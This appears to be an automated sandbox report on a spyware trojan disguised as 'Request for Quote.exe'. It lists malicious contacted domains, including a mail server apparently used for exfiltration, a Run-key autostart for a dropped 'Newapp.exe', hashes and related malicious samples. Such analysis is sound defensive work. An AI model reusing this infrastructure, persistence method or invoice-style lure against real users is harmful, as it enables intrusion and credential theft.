http://www.jiyu-kobo.co.jp/g	0%	Avira URL Cloud	safe
http://0hH44dwVeXbULYg.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
flagmonkey.com.au	223.130.27.213	true	true		unknown
mail.flagmonkey.com.au	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://0hH44dwVeXbULYg.com	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:HTTP/1.1	Request for Quote.exe, 00000005.00000002.504112296.0000000003061000.00000004.00000001.sdmp, Newapp.exe, 00000014.00000002.503874782.0000000003431000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.fontbureau.com/designersG	Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	false		high
http://www.tiro.com	Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css	Request for Quote.exe, 00000000.00000002.249097967.00000000025B1000.00000004.00000001.sdmp, Newapp.exe, 0000000E.00000002.345433821.000000000303E000.00000004.00000001.sdmp	false		high
http://www.fontbureau.comrsywa	Request for Quote.exe, 00000000.00000002.253603269.00000000079DA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sajatypeworks.com	Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://qunect.com/download/QuNect.exe&Operation	Request for Quote.exe, 00000000.00000002.249097967.00000000025B1000.00000004.00000001.sdmp, Newapp.exe, 0000000E.00000002.345433821.000000000303E000.00000004.00000001.sdmp, Newapp.exe, 00000015.00000002.348199812.000000000291E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn/=v	Request for Quote.exe, 00000000.00000003.232276547.00000000079FE000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.typography.netD	Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	Request for Quote.exe, 00000000.00000003.237763152.0000000007A01000.00000004.00000001.sdmp, Request for Quote.exe, 00000000.00000003.237538687.0000000007A01000.00000004.00000001.sdmp, Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers$h	Request for Quote.exe, 00000000.00000003.235651160.0000000007A0E000.00000004.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/-	Request for Quote.exe, 00000000.00000003.233085403.00000000079D4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://uHcRbL.com	Newapp.exe, 00000014.00000002.503874782.0000000003431000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designersb	Request for Quote.exe, 00000000.00000003.236763631.0000000007A0E000.00000004.00000001.sdmp	false		high
http://www.galapagosdesign.com/DPlease	Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/Y0	Request for Quote.exe, 00000000.00000003.233218699.00000000079DB000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://validator.w3.org/check?uri=referer	Request for Quote.exe, 00000000.00000002.249097967.00000000025B1000.00000004.00000001.sdmp, Newapp.exe, 0000000E.00000002.345433821.000000000303E000.00000004.00000001.sdmp, Newapp.exe, 00000015.00000002.348199812.000000000291E000.00000004.00000001.sdmp	false		high
https://api.ipify.org%GETMozilla/5.0	Newapp.exe, 00000014.00000002.503874782.0000000003431000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://www.ascendercorp.com/typedesigners.html	Request for Quote.exe, 00000000.00000003.233620527.0000000007A0C000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fonts.com	Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/jp/U	Request for Quote.exe, 00000000.00000003.233466028.00000000079D9000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.zhongyicts.com.cn	Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sakkal.com	Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://flagmonkey.com.au	Request for Quote.exe, 00000005.00000002.506698485.000000000331F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	Request for Quote.exe, 00000000.00000002.249616180.0000000003DB9000.00000004.00000001.sdmp, Request for Quote.exe, 00000005.00000002.495978831.0000000000402000.00000040.00000001.sdmp, Newapp.exe, 0000000E.00000002.346647833.0000000004839000.00000004.00000001.sdmp, Newapp.exe, 00000014.00000002.496055035.0000000000402000.00000040.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	false		high
http://DynDns.comDynDNS	Newapp.exe, 00000014.00000002.503874782.0000000003431000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://qunect.com/download/QuNect.exe	Newapp.exe, 00000015.00000002.348199812.000000000291E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/U	Request for Quote.exe, 00000000.00000003.233085403.00000000079D4000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	Request for Quote.exe, 00000005.00000002.504112296.0000000003061000.00000004.00000001.sdmp, Newapp.exe, 00000014.00000002.503874782.0000000003431000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn%u	Request for Quote.exe, 00000000.00000003.232018672.0000000007A00000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/jp/n	Request for Quote.exe, 00000000.00000003.233085403.00000000079D4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/jp/	Request for Quote.exe, 00000000.00000003.233085403.00000000079D4000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.coma	Request for Quote.exe, 00000000.00000002.253603269.00000000079DA000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.ipify.org%$	Request for Quote.exe, 00000005.00000002.504112296.0000000003061000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.carterandcone.coml	Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn	Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/x	Request for Quote.exe, 00000000.00000003.233085403.00000000079D4000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	Request for Quote.exe, 00000000.00000003.235651160.0000000007A0E000.00000004.00000001.sdmp, Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	false		high
http://www.monotype.	Request for Quote.exe, 00000000.00000003.235244456.0000000007A0E000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/	Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Request for Quote.exe, 00000000.00000003.233085403.00000000079D4000.00000004.00000001.sdmp, Request for Quote.exe, 00000000.00000003.233466028.00000000079D9000.00000004.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/n	Request for Quote.exe, 00000000.00000003.232949267.00000000079D4000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://mail.flagmonkey.com.au	Request for Quote.exe, 00000005.00000002.506698485.000000000331F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers8	Request for Quote.exe, 00000000.00000003.235651160.0000000007A0E000.00000004.00000001.sdmp, Request for Quote.exe, 00000000.00000002.253700613.0000000007B40000.00000002.00000001.sdmp, Newapp.exe, 0000000E.00000002.351021009.00000000083F0000.00000002.00000001.sdmp, Newapp.exe, 00000015.00000002.351383146.0000000007DC0000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/g	Request for Quote.exe, 00000000.00000003.233085403.00000000079D4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers1	Request for Quote.exe, 00000000.00000003.236228951.0000000007A0E000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers/	Request for Quote.exe, 00000000.00000003.235037233.0000000007A0E000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
223.130.27.213	unknown	Australia		45638	SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	356719
Start date:	23.02.2021
Start time:	15:28:23
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Request for Quote.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	33
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@15/4@2/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 3.8% (good quality ratio 1.6%) Quality average: 23.9% Quality standard deviation: 33.1%
HCA Information:	Successful, ratio: 98% Number of executed functions: 225 Number of non-executed functions: 24
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 40.88.32.150, 104.43.193.48, 23.211.6.115, 52.147.198.201, 52.255.188.83, 184.30.20.56, 51.11.168.160, 51.103.5.186, 51.104.139.180, 92.122.213.247, 92.122.213.194, 52.155.217.156, 20.54.26.129 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, vip2-par02p.wns.notify.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:29:35	API Interceptor	709x Sleep call for process: Request for Quote.exe modified
15:30:03	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Newapp C:\Users\user\AppData\Roaming\Newapp\Newapp.exe
15:30:11	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Newapp C:\Users\user\AppData\Roaming\Newapp\Newapp.exe
15:30:14	API Interceptor	351x Sleep call for process: Newapp.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
223.130.27.213	http://benhams.info/backups/invoice/	Get hash	malicious	Browse	benhams.info/favicon.ico

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU	REQUEST FOR QUOTE.exe	Get hash	malicious	Browse	223.130.27.213
	New RFQ.PDF.exe	Get hash	malicious	Browse	223.130.27.213
	3Zn3npGt2R.doc	Get hash	malicious	Browse	103.27.34.23
	SecuriteInfo.com.Variant.Razy.820883.21352.exe	Get hash	malicious	Browse	103.27.32.37
	https://book.designrr.co/?id=36689&token=41772822&type=FP	Get hash	malicious	Browse	103.27.35.164
	SecuriteInfo.com.Trojan.PackedNET.405.32544.exe	Get hash	malicious	Browse	223.130.27.213
	http://www.4341accounts.damsknives.com/?VGH=YWNjb3VudHNAc29mdHNvdXJjZS5jby5ueg==	Get hash	malicious	Browse	110.232.141.250
	Arrivalnotice2020pdf.exe	Get hash	malicious	Browse	103.9.171.52
	qpFvMReV7S.exe	Get hash	malicious	Browse	103.42.108.46
	zisuzZpoW2.exe	Get hash	malicious	Browse	103.27.32.34
	HMNo45VSzL.xls	Get hash	malicious	Browse	112.140.180.17
	http://benhams.info/backups/invoice/	Get hash	malicious	Browse	223.130.27.213
	Account update for your HDFC Bank.exe	Get hash	malicious	Browse	223.130.27.10
	PDF FILE.exe	Get hash	malicious	Browse	223.130.27.10
	H4A2_423.EXE	Get hash	malicious	Browse	103.27.32.34
	http://pinksheep.com/opencart/eRjcgIxS/&d=DwIFaQ	Get hash	malicious	Browse	223.130.27.125
	http://pinksheep.com/opencart/eRjcgIxS/&d=DwIFaQ	Get hash	malicious	Browse	223.130.27.125
	http://pinksheep.com/opencart/eRjcgIxS/	Get hash	malicious	Browse	223.130.27.125
	SC# 84979926 Cargo Delivery .PDF.exe	Get hash	malicious	Browse	223.130.27.10
	REP_IDT_070120_BOR_073020.doc	Get hash	malicious	Browse	103.9.171.8

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Newapp.exe.log Download File
Process:	C:\Users\user\AppData\Roaming\Newapp\Newapp.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
MD5:	69206D3AF7D6EFD08F4B4726998856D3
SHA1:	E778D4BF781F7712163CF5E2F5E7C15953E484CF
SHA-256:	A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
SHA-512:	CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Request for Quote.exe.log Download File
Process:	C:\Users\user\Desktop\Request for Quote.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
MD5:	69206D3AF7D6EFD08F4B4726998856D3
SHA1:	E778D4BF781F7712163CF5E2F5E7C15953E484CF
SHA-256:	A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
SHA-512:	CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Roaming\Newapp\Newapp.exe Download File
Process:	C:\Users\user\Desktop\Request for Quote.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	651776
Entropy (8bit):	7.5170799448257295
Encrypted:	false
SSDEEP:	12288:A3qk56wsnjYSlXqWqAwB+rbPrLd9JS0IvEghyeAXpmbbO0DqnEWPVPpaVBthJkfo:Vk57zkajAwBkPLvUXOe0/qf
MD5:	40CB5C4488FFF6E0C040FF45CBA91ECF
SHA1:	0EA670F7C180A52CD18C0630FEEA996DBF6DCF77
SHA-256:	E9910E5698751EADAA69204411CD4CFE896148B60E71687AB0BD741E790D0488
SHA-512:	C23A22B7448B11FD150E4907028220ECFBCAA347C612C449ADF715DB1FCFFA62839D410EE547981C3103293E4C4039E8574A5EF8FF9B1239A441CB39315EE593
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 29%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....4`..............P.............~.... ........@.. .......................@............@.................................$...W............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................`.......H...........t.......`....n....................................................$...:...H.~p..P...o\|Z..!QpF..s.>.v...n..=rO../...Wof_..]YE].QJ..M^...B.,.V..:..d.T..u.3..0.-Bw...K.L&..].'...D.N.[....:.Uo5N.@...S.L..f....f..1>.....]<9.-.......y..:...X.4hD...1.H_v.35-.x.....!R5~s.....k..!aQcT..1.%t.bM.B....R.n .". Nq.X.........}......2h.....mnn...r......bR.T...%.F..:.R...[...n...2.(e.{)..bd./l.....=..W..h.1o.u.&ky.)l....H...E"...Jk..\|\.1U.V.'..0........vw.,

C:\Users\user\AppData\Roaming\Newapp\Newapp.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\Request for Quote.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.5170799448257295
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	Request for Quote.exe
File size:	651776
MD5:	40cb5c4488fff6e0c040ff45cba91ecf
SHA1:	0ea670f7c180a52cd18c0630feea996dbf6dcf77
SHA256:	e9910e5698751eadaa69204411cd4cfe896148b60e71687ab0bd741e790d0488
SHA512:	c23a22b7448b11fd150e4907028220ecfbcaa347c612c449adf715db1fcffa62839d410ee547981c3103293e4c4039e8574a5ef8ff9b1239a441cb39315ee593
SSDEEP:	12288:A3qk56wsnjYSlXqWqAwB+rbPrLd9JS0IvEghyeAXpmbbO0DqnEWPVPpaVBthJkfo:Vk57zkajAwBkPLvUXOe0/qf
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....4`..............P.............~.... ........@.. .......................@............@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
